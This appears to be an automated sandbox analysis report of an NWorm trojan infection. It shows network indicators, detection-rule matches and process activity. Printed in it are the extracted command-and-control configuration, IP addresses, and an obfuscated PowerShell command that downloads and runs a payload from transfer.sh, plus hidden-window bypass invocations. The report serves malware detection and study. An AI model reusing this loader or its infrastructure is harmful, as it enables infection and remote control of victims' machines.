        Source: 11.0.aspnet_compiler.exe.400000.4.unpackMalware Configuration Extractor: NWorm {"Host": "nyanwmoney.duckdns.org", "Port": "8891", "Mutex": "594274bc", "Version": "v0.3.8", "Network Seprator": "|NW|"}
        Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49771 version: TLS 1.0
        Source: Binary string: ClassLibrary1.pdb source: powershell.exe, 0000000A.00000002.949909108.000001A658B40000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.944900247.000001A640AD2000.00000004.00000800.00020000.00000000.sdmp

        Networking

        barindex
        Source: Malware configuration extractorURLs: nyanwmoney.duckdns.org
        Source: unknownDNS query: name: nyanwmoney.duckdns.org
        Source: Joe Sandbox ViewASN Name: M247GB M247GB
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: global trafficHTTP traffic detected: GET /get/8J0O0I/Server435.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 37.120.141.190 37.120.141.190
        Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
        Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
        Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49771 version: TLS 1.0
        Source: global trafficTCP traffic: 192.168.2.5:49779 -> 37.120.141.190:8891
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: powershell.exe, 00000002.00000003.439062238.000001EE7C64A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.953495769.000001EE7C64A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.949251029.000001A658935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: powershell.exe, 00000002.00000002.953679906.000001EE7C810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m&
        Source: powershell.exe, 00000002.00000003.439498717.000001EE7C958000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.439275078.000001EE7C92B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.439437787.000001EE7C945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
        Source: powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.943977734.000001EE642D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.943924547.000001A6408C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.943675482.0000000003222000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.943615778.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000002.00000002.951646438.000001EE654C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://transfer.sh
        Source: powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 0000000A.00000002.949377445.000001A6589CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.A
        Source: powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.951940043.000001EE655DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.951619061.000001EE654B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh
        Source: wscript.exe, wscript.exe, 00000000.00000003.422141955.000002D263133000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428034000.000002D2616A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428144405.000002D263133000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.421946450.000002D263127000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428138665.000002D263120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/8J0O0I/Se
        Source: powershell.exe, 00000002.00000002.947754218.000001EE649AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948316787.000001EE64CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947600493.000001EE6492C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947928671.000001EE64A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947097260.000001EE6480A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947552930.000001EE6490D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948531822.000001EE64D70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947842716.000001EE64A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948056804.000001EE64AF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948070341.000001EE64AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947244377.000001EE64846000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.951334266.000001EE653F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948446290.000001EE64D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948106783.000001EE64B19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.946965465.000001EE647DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.946689944.000001EE6478B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947963667.000001EE64A96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/8J0O0I/Serv
        Source: wscript.exe, 00000000.00000003.424203468.000002D26132C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.427392004.000002D261330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/8J0O0I/Server435.
        Source: powershell.exe, 00000002.00000002.948298244.000001EE64CCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.946689944.000001EE6478B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.943977734.000001EE642D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947963667.000001EE64A96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/8J0O0I/Server435.txt
        Source: powershell.exe, 0000000A.00000002.949279399.000001A65895F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.vign.
        Source: unknownDNS traffic detected: queries for: store-images.s-microsoft.com
        Source: global trafficHTTP traffic detected: GET /get/8J0O0I/Server435.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive

        System Summary

        barindex
        Source: 11.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 11.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
        Source: 11.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 11.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
        Source: 11.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 11.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
        Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
        Source: 10.2.powershell.exe.1a640e0e328.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 10.2.powershell.exe.1a640e0e328.2.unpack, type: UNPACKEDPEMatched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
        Source: 11.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 11.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
        Source: 11.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 11.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
        Source: 10.2.powershell.exe.1a640e0e328.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
        Source: 10.2.powershell.exe.1a640c386a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
        Source: 10.2.powershell.exe.1a640da2068.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
        Source: 0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 0000000B.00000000.527798017.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 0000000B.00000000.527148888.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 0000000B.00000002.942336968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: 0000000B.00000000.527508335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
        Source: unknownProcess created: Commandline size = 6411
        Source: amsi64_7112.amsi.csv, type: OTHERMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: 11.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 11.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
        Source: 11.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 11.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
        Source: 11.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 11.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
        Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
        Source: 10.2.powershell.exe.1a640e0e328.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 10.2.powershell.exe.1a640e0e328.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
        Source: 11.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 11.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
        Source: 11.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 11.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
        Source: 10.2.powershell.exe.1a640e0e328.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
        Source: 10.2.powershell.exe.1a640c386a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
        Source: 10.2.powershell.exe.1a640da2068.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
        Source: 0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 00000002.00000002.945992351.000001EE646CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: 00000002.00000002.953420708.000001EE7C619000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: 00000002.00000002.947928671.000001EE64A74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: 00000002.00000002.951681461.000001EE654E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: 0000000B.00000000.527798017.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 00000002.00000002.951692197.000001EE654E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: 0000000A.00000002.943052838.000001A63E9D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: 0000000B.00000000.527148888.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 0000000B.00000002.942336968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 00000002.00000002.952998329.000001EE745BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: 0000000B.00000000.527508335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
        Source: C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD\ICPDRCYNSQCDVKBIWIFZCD.bat, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9ECE71D702_2_00007FF9ECE71D70
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9ECE80D7F10_2_00007FF9ECE80D7F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9ECE80D8710_2_00007FF9ECE80D87
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9ECE80D3010_2_00007FF9ECE80D30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9ECE80CD010_2_00007FF9ECE80CD0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9ECF52F2910_2_00007FF9ECF52F29
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_014872C811_2_014872C8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0148BC4811_2_0148BC48
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01487F9811_2_01487F98
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01486F8011_2_01486F80
        Source: YBAXAKQXVYWIXQJDE.VBSInitial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\YBAXAKQXVYWIXQJDE.VBS"
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220308Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkiixbce.yg4.ps1Jump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winVBS@7/7@3/2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
